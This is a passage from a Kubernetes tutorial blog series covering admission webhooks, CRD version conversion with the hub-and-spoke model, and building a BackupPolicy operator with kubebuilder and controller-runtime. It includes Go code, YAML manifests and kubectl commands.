  --version v1alpha1 \
  --kind BackupPolicy \
  --defaulting

Edit the defaulting webhook:

//+kubebuilder:webhook:path=/mutate-storage-example-com-v1alpha1-backuppolicy,mutating=true,failurePolicy=fail,sideEffects=None,groups=storage.example.com,resources=backuppolicies,verbs=create,versions=v1alpha1,name=mbackuppolicy.kb.io,admissionReviewVersions=v1

func (r *BackupPolicy) Default() {
    // Default is called by kubebuilder's webhook framework on admission.
    // The webhook handler calls this and patches the object.
    //
    // This runs AFTER API server schema defaults — use it for context-dependent defaults.
}

// For namespace-label-based injection, implement the full webhook handler instead:
type BackupPolicyMutator struct {
    Client client.Client
}

func (m *BackupPolicyMutator) Handle(ctx context.Context, req admission.Request) admission.Response {
    bp := &BackupPolicy{}
    if err := json.Unmarshal(req.Object.Raw, bp); err != nil {
        return admission.Errored(http.StatusBadRequest, err)
    }

    // Fetch the namespace to read its labels
    ns := &corev1.Namespace{}
    if err := m.Client.Get(ctx, types.NamespacedName{Name: bp.Namespace}, ns); err != nil {
        return admission.Errored(http.StatusInternalServerError, err)
    }

    // Inject costCenter annotation from namespace label
    if costCenter, ok := ns.Labels["billing/cost-center"]; ok {
        if bp.Annotations == nil {
            bp.Annotations = make(map[string]string)
        }
        bp.Annotations["billing/cost-center"] = costCenter
    }

    marshaled, err := json.Marshal(bp)
    if err != nil {
        return admission.Errored(http.StatusInternalServerError, err)
    }
    return admission.PatchResponseFromRaw(req.Object.Raw, marshaled)
}

The WebhookConfiguration Resource

The ValidatingWebhookConfiguration tells the API server which webhooks exist and which resources/operations they handle:

apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
metadata:
  name: backup-operator-validating-webhook
  annotations:
    cert-manager.io/inject-ca-from: backup-operator-system/backup-operator-serving-cert
webhooks:
  - name: vbackuppolicy.kb.io
    admissionReviewVersions: ["v1"]
    clientConfig:
      service:
        name: backup-operator-webhook-service
        namespace: backup-operator-system
        path: /validate-storage-example-com-v1alpha1-backuppolicy
    rules:
      - apiGroups:   ["storage.example.com"]
        apiVersions: ["v1alpha1"]
        operations:  ["CREATE", "UPDATE"]
        resources:   ["backuppolicies"]
    failurePolicy: Fail          # Fail = reject request if webhook unreachable
    sideEffects: None
    timeoutSeconds: 10
    namespaceSelector:
      matchExpressions:
        - key: kubernetes.io/metadata.name
          operator: NotIn
          values: ["kube-system"]  # never webhook kube-system objects

failurePolicy: Fail vs Ignore

  failurePolicy: Fail (default)
  ──────────────────────────────
  If webhook is unreachable → API request fails with 500
  Use when: the validation is critical (quota enforcement, policy)
  Risk: your webhook becoming unavailable breaks all covered API operations

  failurePolicy: Ignore
  ──────────────────────────────
  If webhook is unreachable → API request proceeds as if webhook allowed it
  Use when: the webhook is advisory or can be bypassed safely
  Risk: policy is silently not enforced during webhook outage

For production operators, use failurePolicy: Fail but ensure high availability:
– Run at least 2 webhook pod replicas with PodDisruptionBudget
– Use cert-manager for automatic TLS certificate rotation
– Set timeoutSeconds to a value that allows graceful degradation (5–10s)
– Exclude system namespaces with namespaceSelector


OPA/Gatekeeper and Kyverno: Webhooks as Policy Platforms

Writing raw webhook handlers in Go is powerful but heavyweight for policy enforcement. OPA/Gatekeeper and Kyverno are webhook-based policy engines that let you express policies as code:

Kyverno (YAML-based policies):

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-backup-label
spec:
  rules:
    - name: require-team-label
      match:
        any:
          - resources:
              kinds: ["BackupPolicy"]
      validate:
        message: "BackupPolicy must have a 'team' label"
        pattern:
          metadata:
            labels:
              team: "?*"

OPA/Gatekeeper (Rego-based policies):

package backuppolicy

deny[msg] {
    input.request.kind.kind == "BackupPolicy"
    not input.request.object.metadata.labels["team"]
    msg := "BackupPolicy must have a 'team' label"
}

Both run as admission webhooks that the API server calls. The policy language sits on top of the webhook plumbing. For organizational policy enforcement across many resource types, these tools outperform custom Go webhook handlers.


⚠ Common Mistakes

Webhook covering * resources or * operations. A webhook covering all resources in the cluster is a reliability risk — a bug in the webhook or an outage breaks everything. Scope webhooks to exactly the resources and operations they need with rules[].resources and rules[].operations.

No TLS certificate rotation. Webhook endpoints require a TLS certificate that the API server trusts. Certificates expire. Using cert-manager with the cert-manager.io/inject-ca-from annotation automates this. Without it, expired certificates cause silent webhook outages (the API server rejects the TLS handshake, triggering failurePolicy behavior).

Not excluding system namespaces. If a validating webhook covers Pods and has failurePolicy: Fail, and the webhook pod itself crashes, the API server cannot create a new webhook pod because the webhook rejects the creation. Use namespaceSelector to exclude kube-system and your operator’s own namespace.

Treating webhook latency as free. Every API operation covered by a webhook adds a synchronous HTTP round-trip. On a busy cluster creating thousands of objects per minute, a 100ms webhook latency becomes significant. Set timeoutSeconds, profile webhook performance, and scope rules narrowly.


Quick Reference

# List all webhook configurations
kubectl get validatingwebhookconfigurations
kubectl get mutatingwebhookconfigurations

# Inspect webhook rules and failure policy
kubectl describe validatingwebhookconfiguration backup-operator-validating-webhook

# Temporarily disable a webhook for debugging (dangerous in production)
kubectl delete validatingwebhookconfiguration backup-operator-validating-webhook

# Check webhook endpoint certificate
kubectl get secret backup-operator-webhook-server-cert \
  -n backup-operator-system \
  -o jsonpath='{.data.tls\.crt}' | base64 -d | openssl x509 -noout -dates

# Test webhook is reachable from a cluster node
kubectl run webhook-test --image=curlimages/curl --rm -it --restart=Never -- \
  curl -k https://backup-operator-webhook-service.backup-operator-system.svc:443/healthz

Key Takeaways

  • Mutating webhooks modify objects at admission; validating webhooks approve or reject them — mutating runs before validating
  • Use CEL for rules that depend only on the submitted object; use webhooks when you need external lookups or cross-resource checks
  • failurePolicy: Fail blocks API requests if the webhook is unreachable — ensure high availability before using it
  • Always exclude system namespaces and scope rules to specific resource types to minimize the blast radius of webhook failures
  • OPA/Gatekeeper and Kyverno are admission webhook platforms for policy-as-code — prefer them over custom Go handlers for organizational policy enforcement

What’s Next

EP10: Kubernetes CRDs in Production ties the full series together — finalizer design patterns, status condition conventions, owner references, RBAC for multi-tenant CRD usage, and the production failure modes that catch teams off guard.

Get EP10 in your inbox when it publishes → subscribe at linuxcent.com

Kubernetes CRD Versioning: From v1alpha1 to v1 Without Breaking Clients

Reading Time: 6 minutes

Kubernetes CRDs & Operators: Extending the API, Episode 8
What Is a CRD? · CRDs You Already Use · CRD Anatomy · Write Your First CRD · CEL Validation · Controller Loop · Build an Operator · CRD Versioning · Admission Webhooks · CRDs in Production


TL;DR

  • Kubernetes CRD versioning lets you evolve your API from v1alpha1 to v1 without deleting existing custom resources or breaking clients still using the old version
    (storage version = the version etcd actually stores objects in; served versions = the versions the API server responds to; you can serve v1alpha1 and v1 simultaneously while migrating)
  • The hub-and-spoke model is the recommended conversion architecture: one “hub” version (usually v1) that every other version converts to/from
  • Without a conversion webhook, the API server only allows one served version at a time — you must use a webhook to serve multiple versions with schema differences
  • kubectl storage-version-migrator (or manual re-apply) migrates existing objects from the old storage version to the new one after you update storage: true
  • Changing field names between versions without a conversion webhook corrupts data silently — always test conversion round-trips before promoting a version

The Big Picture

  CRD VERSION LIFECYCLE

  Stage 1: Alpha                 Stage 2: Beta              Stage 3: Stable
  ──────────────────             ──────────────             ──────────────
  v1alpha1                       v1alpha1 (deprecated)      v1alpha1 (removed)
    served: true                   served: true               served: false
    storage: true                  storage: false             storage: false
                                 v1beta1                    v1beta1 (deprecated)
                                   served: true               served: true
                                   storage: false             storage: false
                                 v1                         v1
                                   served: true               served: true
                                   storage: true              storage: true

  Clients using v1alpha1:         The API server converts     Eventually remove
  still work via conversion       on the fly                  old served versions
  webhook

Kubernetes CRD versioning is what allows you to ship BackupPolicy v1alpha1 today, learn from real usage, evolve the schema to v1 with renamed fields and new constraints, and keep existing clusters running without a migration window.


Why Versioning Is Necessary

When BackupPolicy v1alpha1 shipped, the spec used retentionDays. After six months of production use, the team learns:

  • retentionDays should be renamed to retention.days (nested under a retention object for future extensibility)
  • A new required field backupFormat needs to be added with a default of tar.gz
  • The targets field should be renamed to includedNamespaces

These are breaking changes. Clients (GitOps repos, Helm charts, other operators) still have YAML referencing v1alpha1 with the old field names. You cannot simply rename the fields.

The solution: add v1 with the new schema, run both versions simultaneously via a conversion webhook, migrate objects to the new storage version, then deprecate v1alpha1.


Simple Case: Non-Breaking Addition (No Webhook Needed)

If you only add new optional fields to the schema — no renames, no removals — you can add a new version without a conversion webhook, as long as only one version is served at a time.

versions:
  - name: v1alpha1
    served: false      # stop serving old version
    storage: false
    schema: ...
  - name: v1
    served: true
    storage: true
    schema:
      openAPIV3Schema:
        properties:
          spec:
            properties:
              schedule:
                type: string
              retentionDays:
                type: integer
              backupFormat:          # new optional field
                type: string
                default: "tar.gz"

Existing objects stored as v1alpha1 are served as v1 with the new field defaulted. This works for purely additive changes because the stored bytes are compatible with the new schema.

When this is not enough: field renames, type changes, field removal, or structural reorganization all require a conversion webhook.


The Hub-and-Spoke Model

For breaking schema changes, the API server needs a conversion webhook. The recommended architecture is hub-and-spoke:

  HUB-AND-SPOKE CONVERSION

       v1alpha1
          │
          ▼ convert to hub
         v1  (hub)
          ▲
          │ convert to hub
       v1beta1

  Every version converts TO the hub and FROM the hub.
  The hub is always the storage version.
  Two-version conversion: v1alpha1 → v1 → v1beta1
  Never directly: v1alpha1 → v1beta1

This means you only write N conversion functions (one per version) rather than N² (one per version pair). As you add versions, the conversion complexity grows linearly.


Writing a Conversion Webhook

The conversion webhook is an HTTPS endpoint that the API server calls when it needs to convert an object between versions.

1. Define the conversion hub

In the kubebuilder project, mark v1 as the hub:

In api/v1/backuppolicy_conversion.go:

package v1

// Hub marks this type as the conversion hub.
func (*BackupPolicy) Hub() {}

2. Implement conversion in v1alpha1

In api/v1alpha1/backuppolicy_conversion.go:

package v1alpha1

import (
    "fmt"
    v1 "github.com/example/backup-operator/api/v1"
    "sigs.k8s.io/controller-runtime/pkg/conversion"
)

// ConvertTo converts v1alpha1 BackupPolicy to v1 (the hub).
func (src *BackupPolicy) ConvertTo(dstRaw conversion.Hub) error {
    dst := dstRaw.(*v1.BackupPolicy)

    // Metadata
    dst.ObjectMeta = src.ObjectMeta

    // Field mapping: v1alpha1 → v1
    dst.Spec.Schedule      = src.Spec.Schedule
    dst.Spec.BackupFormat  = "tar.gz"           // new field: default for old objects
    dst.Spec.StorageClass  = src.Spec.StorageClass
    dst.Spec.Suspended     = src.Spec.Suspended

    // Renamed field: retentionDays → retention.days
    dst.Spec.Retention = v1.RetentionSpec{
        Days: src.Spec.RetentionDays,
    }

    // Renamed field: targets → includedNamespaces
    for _, t := range src.Spec.Targets {
        dst.Spec.IncludedNamespaces = append(dst.Spec.IncludedNamespaces,
            v1.NamespaceTarget{
                Namespace:      t.Namespace,
                IncludeSecrets: t.IncludeSecrets,
            })
    }

    dst.Status = v1.BackupPolicyStatus(src.Status)
    return nil
}

// ConvertFrom converts v1 (hub) BackupPolicy back to v1alpha1.
func (dst *BackupPolicy) ConvertFrom(srcRaw conversion.Hub) error {
    src := srcRaw.(*v1.BackupPolicy)

    dst.ObjectMeta = src.ObjectMeta

    dst.Spec.Schedule      = src.Spec.Schedule
    dst.Spec.StorageClass  = src.Spec.StorageClass
    dst.Spec.Suspended     = src.Spec.Suspended
    dst.Spec.RetentionDays = src.Spec.Retention.Days

    for _, n := range src.Spec.IncludedNamespaces {
        dst.Spec.Targets = append(dst.Spec.Targets, BackupTarget{
            Namespace:      n.Namespace,
            IncludeSecrets: n.IncludeSecrets,
        })
    }

    // backupFormat cannot be round-tripped to v1alpha1 (no such field)
    // Store it in an annotation to preserve the value if the object is
    // re-converted back to v1.
    if src.Spec.BackupFormat != "" && src.Spec.BackupFormat != "tar.gz" {
        if dst.Annotations == nil {
            dst.Annotations = make(map[string]string)
        }
        dst.Annotations["storage.example.com/backup-format"] = src.Spec.BackupFormat
    }

    dst.Status = BackupPolicyStatus(src.Status)
    return nil
}

3. Register the webhook

kubebuilder create webhook \
  --group storage \
  --version v1alpha1 \
  --kind BackupPolicy \
  --conversion

This generates the webhook server setup. Deploy with a TLS certificate (cert-manager can manage this automatically via the kubebuilder //+kubebuilder:webhook:... marker).


Updating the CRD to Reference the Webhook

spec:
  conversion:
    strategy: Webhook
    webhook:
      clientConfig:
        service:
          name: backup-operator-webhook-service
          namespace: backup-operator-system
          path: /convert
      conversionReviewVersions: ["v1", "v1beta1"]
  versions:
    - name: v1alpha1
      served: true
      storage: false
      schema: ...
    - name: v1
      served: true
      storage: true
      schema: ...

Once applied, kubectl get backuppolicies.v1alpha1.storage.example.com/nightly and kubectl get backuppolicies.v1.storage.example.com/nightly both work — the API server converts transparently.


Migrating Existing Objects to the New Storage Version

After changing storage: true from v1alpha1 to v1, existing objects in etcd are still stored as v1alpha1 bytes. They are served correctly (via conversion) but are not yet migrated.

Migrate them:

# Option 1: Manual re-apply (works for small object counts)
kubectl get backuppolicies -A -o name | while read name; do
  kubectl apply -f <(kubectl get $name -o yaml)
done

# Option 2: Storage Version Migrator (automated, for large clusters)
# Install: https://github.com/kubernetes-sigs/kube-storage-version-migrator
kubectl apply -f storageVersionMigration.yaml

After migration, all objects in etcd are stored as v1. You can then set v1alpha1 served: false to stop serving the old version.


Storage Version Migration Checklist

  SAFE VERSION PROMOTION CHECKLIST

  □ New version (v1) has served: true, storage: true
  □ Old version (v1alpha1) has served: true, storage: false
  □ Conversion webhook deployed and healthy
  □ Round-trip conversion tested (v1alpha1 → v1 → v1alpha1 preserves all data)
  □ kubectl get backuppolicies works at both versions
  □ Existing objects migrated (re-applied or migration job run)
  □ Old version set to served: false (stop serving)
  □ Old version removed from CRD after N release cycles

⚠ Common Mistakes

Changing the storage version without a conversion webhook. If you flip storage: true from v1alpha1 to v1 while still serving v1alpha1, the API server tries to read stored v1alpha1 bytes as v1 and fails. Always deploy the conversion webhook before changing the storage version.

Lossy conversion. If ConvertFrom (v1 → v1alpha1) drops a field that exists in v1, objects are silently corrupted when a v1alpha1 client reads and re-saves them. Round-trip test every conversion: original → hub → original must produce identical objects (or use annotations to preserve fields that cannot round-trip).

Forgetting to migrate existing objects. After changing the storage version, existing objects are still stored in the old format. They convert on read, but etcd still holds old bytes. Until migrated, your etcd backup/restore story is broken — restoring from backup would restore old-format bytes that need conversion.


Quick Reference

# Check which version is currently the storage version
kubectl get crd backuppolicies.storage.example.com \
  -o jsonpath='{.status.storedVersions}'
# output: ["v1alpha1"]  or  ["v1alpha1","v1"]  or  ["v1"]

# Verify conversion webhook is reachable
kubectl get crd backuppolicies.storage.example.com \
  -o jsonpath='{.spec.conversion.webhook.clientConfig}'

# Read an object at a specific version
kubectl get backuppolicies.v1alpha1.storage.example.com/nightly -n demo -o yaml
kubectl get backuppolicies.v1.storage.example.com/nightly -n demo -o yaml

# Check CRD conditions (NamesAccepted, Established)
kubectl describe crd backuppolicies.storage.example.com | grep -A5 Conditions

Key Takeaways

  • CRD versioning lets you evolve the schema without a migration window — old and new versions coexist via a conversion webhook
  • The hub-and-spoke model minimizes conversion code: N functions, not N² — the hub version is always the storage version
  • Never change the storage version without a deployed conversion webhook for breaking schema changes
  • Conversion must be lossless — fields that cannot round-trip should be preserved in annotations
  • Migrate existing objects to the new storage version after promoting it, then deprecate the old served version

What’s Next

EP09: Admission Webhooks completes the Kubernetes extension picture — validating and mutating webhooks that intercept API requests before they reach etcd, when to use them alongside CRDs, and how they differ from CEL validation.

Get EP09 in your inbox when it publishes → subscribe at linuxcent.com

Build a Simple Kubernetes Operator with controller-runtime and kubebuilder

Reading Time: 7 minutes

Kubernetes CRDs & Operators: Extending the API, Episode 7
What Is a CRD? · CRDs You Already Use · CRD Anatomy · Write Your First CRD · CEL Validation · Controller Loop · Build an Operator · CRD Versioning · Admission Webhooks · CRDs in Production


TL;DR

  • Building a Kubernetes operator means writing a Go reconciler with controller-runtime — kubebuilder scaffolds the project structure, RBAC markers, and Makefile targets so you focus on the reconcile logic
    (kubebuilder = a CLI and framework that generates the operator project scaffold; controller-runtime = the Go library that provides the informer cache, work queue, and reconciler interface)
  • The reconciler for BackupPolicy in this episode creates and manages a CronJob — it is the behavior layer for the CRD built in EP03–EP05
  • RBAC is expressed as Go code comments (//+kubebuilder:rbac:...) — kubebuilder generates the ClusterRole YAML from them
  • Run the operator locally with make run during development; no cluster deployment needed until ready
  • The same project that builds the operator also builds and installs the CRD — make install applies the CRD YAML generated from your Go types
  • Testing: the operator ships with envtest — a local API server + etcd for controller testing without a real cluster

The Big Picture

  OPERATOR PROJECT STRUCTURE (kubebuilder scaffold)

  backup-operator/
  ├── api/v1alpha1/
  │   ├── backuppolicy_types.go     ← Go types that define CRD schema
  │   └── groupversion_info.go
  ├── internal/controller/
  │   └── backuppolicy_controller.go ← reconcile logic (our main focus)
  ├── config/
  │   ├── crd/                       ← generated CRD YAML
  │   ├── rbac/                      ← generated RBAC YAML
  │   └── manager/                   ← controller Deployment YAML
  ├── cmd/main.go                    ← entrypoint, sets up the manager
  └── Makefile                       ← build, test, install, deploy targets

  FLOW:
  Go types → kubebuilder generate → CRD YAML + RBAC YAML
  Reconcile function → runs in cluster → watches BackupPolicy → manages CronJobs

Building a Kubernetes operator with controller-runtime is where CRDs become living infrastructure — the BackupPolicy objects created in EP04 now get actual behavior attached to them.


Prerequisites

# Go 1.22+
go version

# kubebuilder CLI
curl -L -o kubebuilder \
  https://github.com/kubernetes-sigs/kubebuilder/releases/latest/download/kubebuilder_linux_amd64
chmod +x kubebuilder
sudo mv kubebuilder /usr/local/bin/

# A running cluster (kind works well for development)
kind create cluster --name operator-dev

# Verify kubectl works
kubectl cluster-info --context kind-operator-dev

Step 1: Scaffold the Project

mkdir backup-operator && cd backup-operator

# Initialize the Go module and project structure
kubebuilder init \
  --domain storage.example.com \
  --repo github.com/example/backup-operator

# Create the API (Go types + controller scaffold)
kubebuilder create api \
  --group storage \
  --version v1alpha1 \
  --kind BackupPolicy \
  --resource \
  --controller

When prompted:

Create Resource [y/n]: y
Create Controller [y/n]: y

The generated directory tree:

backup-operator/
├── api/
│   └── v1alpha1/
│       ├── backuppolicy_types.go
│       └── groupversion_info.go
├── internal/
│   └── controller/
│       └── backuppolicy_controller.go
├── cmd/
│   └── main.go
├── config/
│   ├── crd/bases/
│   ├── rbac/
│   └── manager/
├── go.mod
├── go.sum
└── Makefile

Step 2: Define the Go Types

Edit api/v1alpha1/backuppolicy_types.go to match the schema from EP03:

package v1alpha1

import (
    metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)

// BackupTarget specifies a namespace to include in the backup.
type BackupTarget struct {
    Namespace      string `json:"namespace"`
    IncludeSecrets bool   `json:"includeSecrets,omitempty"`
}

// BackupPolicySpec defines the desired state of BackupPolicy.
type BackupPolicySpec struct {
    // Schedule is a cron expression for when to run backups.
    // +kubebuilder:validation:Pattern=`^(\*|[0-9,\-\/]+) (\*|[0-9,\-\/]+) (\*|[0-9,\-\/]+) (\*|[0-9,\-\/]+) (\*|[0-9,\-\/]+)$`
    Schedule string `json:"schedule"`

    // RetentionDays is how long to keep backup snapshots.
    // +kubebuilder:validation:Minimum=1
    // +kubebuilder:validation:Maximum=365
    RetentionDays int32 `json:"retentionDays"`

    // StorageClass is the storage class to use for backup volumes.
    // +kubebuilder:default=standard
    // +kubebuilder:validation:Enum=standard;premium;encrypted;archive
    StorageClass string `json:"storageClass,omitempty"`

    // Targets lists the namespaces and resources to include.
    // +kubebuilder:validation:MaxItems=20
    Targets []BackupTarget `json:"targets,omitempty"`

    // Suspended pauses backup execution when true.
    // +kubebuilder:default=false
    Suspended bool `json:"suspended,omitempty"`
}

// BackupPolicyStatus defines the observed state of BackupPolicy.
type BackupPolicyStatus struct {
    // Conditions reflect the current state of the BackupPolicy.
    Conditions []metav1.Condition `json:"conditions,omitempty"`

    // LastBackupTime is when the most recent backup completed.
    LastBackupTime *metav1.Time `json:"lastBackupTime,omitempty"`

    // CronJobName is the name of the managed CronJob.
    CronJobName string `json:"cronJobName,omitempty"`
}

// +kubebuilder:object:root=true
// +kubebuilder:subresource:status
// +kubebuilder:printcolumn:name="Schedule",type=string,JSONPath=`.spec.schedule`
// +kubebuilder:printcolumn:name="Retention",type=integer,JSONPath=`.spec.retentionDays`
// +kubebuilder:printcolumn:name="Suspended",type=boolean,JSONPath=`.spec.suspended`
// +kubebuilder:printcolumn:name="Ready",type=string,JSONPath=`.status.conditions[?(@.type=='Ready')].status`
// +kubebuilder:printcolumn:name="Age",type=date,JSONPath=`.metadata.creationTimestamp`

// BackupPolicy is the Schema for the backuppolicies API.
type BackupPolicy struct {
    metav1.TypeMeta   `json:",inline"`
    metav1.ObjectMeta `json:"metadata,omitempty"`

    Spec   BackupPolicySpec   `json:"spec,omitempty"`
    Status BackupPolicyStatus `json:"status,omitempty"`
}

// +kubebuilder:object:root=true

// BackupPolicyList contains a list of BackupPolicy.
type BackupPolicyList struct {
    metav1.TypeMeta `json:",inline"`
    metav1.ListMeta `json:"metadata,omitempty"`
    Items           []BackupPolicy `json:"items"`
}

func init() {
    SchemeBuilder.Register(&BackupPolicy{}, &BackupPolicyList{})
}

Regenerate the CRD YAML and DeepCopy methods:

make generate   # regenerates zz_generated.deepcopy.go
make manifests  # regenerates CRD YAML under config/crd/bases/

Step 3: Write the Reconciler

Edit internal/controller/backuppolicy_controller.go:

package controller

import (
    "context"
    "fmt"

    batchv1 "k8s.io/api/batch/v1"
    corev1 "k8s.io/api/core/v1"
    apierrors "k8s.io/apimachinery/pkg/api/errors"
    "k8s.io/apimachinery/pkg/api/meta"
    metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
    "k8s.io/apimachinery/pkg/runtime"
    "k8s.io/apimachinery/pkg/types"
    ctrl "sigs.k8s.io/controller-runtime"
    "sigs.k8s.io/controller-runtime/pkg/client"
    "sigs.k8s.io/controller-runtime/pkg/log"

    storagev1alpha1 "github.com/example/backup-operator/api/v1alpha1"
)

// BackupPolicyReconciler reconciles BackupPolicy objects.
type BackupPolicyReconciler struct {
    client.Client
    Scheme *runtime.Scheme
}

// RBAC markers — kubebuilder generates ClusterRole YAML from these comments.
//+kubebuilder:rbac:groups=storage.example.com,resources=backuppolicies,verbs=get;list;watch;create;update;patch;delete
//+kubebuilder:rbac:groups=storage.example.com,resources=backuppolicies/status,verbs=get;update;patch
//+kubebuilder:rbac:groups=storage.example.com,resources=backuppolicies/finalizers,verbs=update
//+kubebuilder:rbac:groups=batch,resources=cronjobs,verbs=get;list;watch;create;update;patch;delete

func (r *BackupPolicyReconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) {
    logger := log.FromContext(ctx)

    // Step 1: Fetch the BackupPolicy
    bp := &storagev1alpha1.BackupPolicy{}
    if err := r.Get(ctx, req.NamespacedName, bp); err != nil {
        if apierrors.IsNotFound(err) {
            // Object deleted before we could reconcile — nothing to do.
            return ctrl.Result{}, nil
        }
        return ctrl.Result{}, fmt.Errorf("fetching BackupPolicy: %w", err)
    }

    // Step 2: Define the desired CronJob name
    cronJobName := fmt.Sprintf("%s-backup", bp.Name)

    // Step 3: Fetch the existing CronJob (if any)
    existing := &batchv1.CronJob{}
    err := r.Get(ctx, types.NamespacedName{Name: cronJobName, Namespace: bp.Namespace}, existing)
    notFound := apierrors.IsNotFound(err)
    if err != nil && !notFound {
        return ctrl.Result{}, fmt.Errorf("fetching CronJob: %w", err)
    }

    // Step 4: Build the desired CronJob
    desired := r.buildCronJob(bp, cronJobName)

    // Step 5: Create or update
    if notFound {
        logger.Info("Creating CronJob", "name", cronJobName)
        if err := r.Create(ctx, desired); err != nil {
            return ctrl.Result{}, fmt.Errorf("creating CronJob: %w", err)
        }
    } else {
        // Update schedule and suspend state if they differ
        if existing.Spec.Schedule != desired.Spec.Schedule ||
            existing.Spec.Suspend != desired.Spec.Suspend {
            existing.Spec.Schedule = desired.Spec.Schedule
            existing.Spec.Suspend = desired.Spec.Suspend
            logger.Info("Updating CronJob", "name", cronJobName)
            if err := r.Update(ctx, existing); err != nil {
                return ctrl.Result{}, fmt.Errorf("updating CronJob: %w", err)
            }
        }
    }

    // Step 6: Update status
    bpCopy := bp.DeepCopy()
    meta.SetStatusCondition(&bpCopy.Status.Conditions, metav1.Condition{
        Type:               "Ready",
        Status:             metav1.ConditionTrue,
        Reason:             "CronJobReady",
        Message:            fmt.Sprintf("CronJob %s is configured", cronJobName),
        ObservedGeneration: bp.Generation,
    })
    bpCopy.Status.CronJobName = cronJobName

    if err := r.Status().Update(ctx, bpCopy); err != nil {
        return ctrl.Result{}, fmt.Errorf("updating status: %w", err)
    }

    return ctrl.Result{}, nil
}

func (r *BackupPolicyReconciler) buildCronJob(bp *storagev1alpha1.BackupPolicy, name string) *batchv1.CronJob {
    suspend := bp.Spec.Suspended
    retentionArg := fmt.Sprintf("--retention-days=%d", bp.Spec.RetentionDays)

    cj := &batchv1.CronJob{
        ObjectMeta: metav1.ObjectMeta{
            Name:      name,
            Namespace: bp.Namespace,
            Labels: map[string]string{
                "app.kubernetes.io/managed-by": "backup-operator",
                "backuppolicy":                 bp.Name,
            },
        },
        Spec: batchv1.CronJobSpec{
            Schedule: bp.Spec.Schedule,
            Suspend:  &suspend,
            JobTemplate: batchv1.JobTemplateSpec{
                Spec: batchv1.JobSpec{
                    Template: corev1.PodTemplateSpec{
                        Spec: corev1.PodSpec{
                            RestartPolicy: corev1.RestartPolicyOnFailure,
                            Containers: []corev1.Container{
                                {
                                    Name:    "backup",
                                    Image:   "backup-tool:latest",
                                    Args:    []string{retentionArg},
                                },
                            },
                        },
                    },
                },
            },
        },
    }

    // Set owner reference — CronJob is garbage-collected when BackupPolicy is deleted
    _ = ctrl.SetControllerReference(bp, cj, r.Scheme)
    return cj
}

// SetupWithManager registers the controller with the manager and declares what to watch.
func (r *BackupPolicyReconciler) SetupWithManager(mgr ctrl.Manager) error {
    return ctrl.NewControllerManagedBy(mgr).
        For(&storagev1alpha1.BackupPolicy{}).
        Owns(&batchv1.CronJob{}).    // reconcile BackupPolicy when owned CronJob changes
        Complete(r)
}

Step 4: Install the CRD and Run Locally

# Install the CRD into the cluster
make install
customresourcedefinition.apiextensions.k8s.io/backuppolicies.storage.example.com created
# Run the controller locally (outside the cluster)
make run
2026-04-25T08:00:00Z  INFO  Starting manager
2026-04-25T08:00:00Z  INFO  Starting workers  {"controller": "backuppolicy", "worker count": 1}

In a separate terminal:

kubectl apply -f - <<'EOF'
apiVersion: storage.example.com/v1alpha1
kind: BackupPolicy
metadata:
  name: nightly
  namespace: default
spec:
  schedule: "0 2 * * *"
  retentionDays: 30
EOF

Watch the controller output:

2026-04-25T08:01:00Z  INFO  Creating CronJob  {"name": "nightly-backup"}

Check the result:

kubectl get bp nightly
NAME      SCHEDULE    RETENTION   SUSPENDED   READY   AGE
nightly   0 2 * * *   30          false       True    10s
kubectl get cronjob nightly-backup
NAME             SCHEDULE    SUSPEND   ACTIVE   LAST SCHEDULE   AGE
nightly-backup   0 2 * * *   False     0        <none>          10s

Test self-healing — delete the CronJob and watch the controller recreate it:

kubectl delete cronjob nightly-backup
# Controller output:
# 2026-04-25T08:02:00Z  INFO  Creating CronJob  {"name": "nightly-backup"}

kubectl get cronjob nightly-backup
# Back within seconds

Test suspend:

kubectl patch bp nightly --type=merge -p '{"spec":{"suspended":true}}'
kubectl get cronjob nightly-backup -o jsonpath='{.spec.suspend}'
# true

Step 5: Deploy to Cluster

When ready for in-cluster deployment:

# Build and push the controller image
make docker-build docker-push IMG=your-registry/backup-operator:v0.1.0

# Deploy to cluster (creates Deployment, RBAC, CRD)
make deploy IMG=your-registry/backup-operator:v0.1.0
kubectl get pods -n backup-operator-system
NAME                                          READY   STATUS    RESTARTS   AGE
backup-operator-controller-manager-abc123     2/2     Running   0          30s

Understanding the RBAC Markers

The //+kubebuilder:rbac:... comments in the controller generate the ClusterRole YAML when you run make manifests:

//+kubebuilder:rbac:groups=storage.example.com,resources=backuppolicies,verbs=get;list;watch;create;update;patch;delete
//+kubebuilder:rbac:groups=storage.example.com,resources=backuppolicies/status,verbs=get;update;patch
//+kubebuilder:rbac:groups=batch,resources=cronjobs,verbs=get;list;watch;create;update;patch;delete

Generated YAML under config/rbac/role.yaml:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: manager-role
rules:
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies"]
    verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
  - apiGroups: ["storage.example.com"]
    resources: ["backuppolicies/status"]
    verbs: ["get", "update", "patch"]
  - apiGroups: ["batch"]
    resources: ["cronjobs"]
    verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]

This approach keeps RBAC co-located with the code that needs it — if you add a new resource access in the controller, you add the marker next to it.


⚠ Common Mistakes

Not setting an owner reference on child resources. Without ctrl.SetControllerReference(parent, child, scheme), deleting the BackupPolicy leaves orphaned CronJobs. Owner references enable automatic garbage collection of child resources.

Updating the object after r.Get() without handling conflicts. If two reconciles run concurrently (possible after a controller restart), both may try to update the same resource. The API server uses resource version for optimistic concurrency — you will get a conflict error. Retry the reconcile on conflict errors rather than failing.

Writing to bp directly instead of bp.DeepCopy() for status updates. If the status update fails and you retry, the original bp object now has the modified status in memory. Always update a deep copy when writing status so the in-memory state stays consistent with what was actually persisted.

Not watching owned resources. If you forget .Owns(&batchv1.CronJob{}) in SetupWithManager, the controller will not reconcile when a CronJob is deleted. Self-healing requires watching the resources you manage.


Quick Reference

# Scaffold a new API + controller
kubebuilder create api --group mygroup --version v1alpha1 --kind MyKind

# Regenerate deep copy methods after changing types
make generate

# Regenerate CRD YAML + RBAC from markers
make manifests

# Install CRD into current cluster
make install

# Run controller locally (outside cluster)
make run

# Build + push image, then deploy to cluster
make docker-build docker-push IMG=registry/operator:tag
make deploy IMG=registry/operator:tag

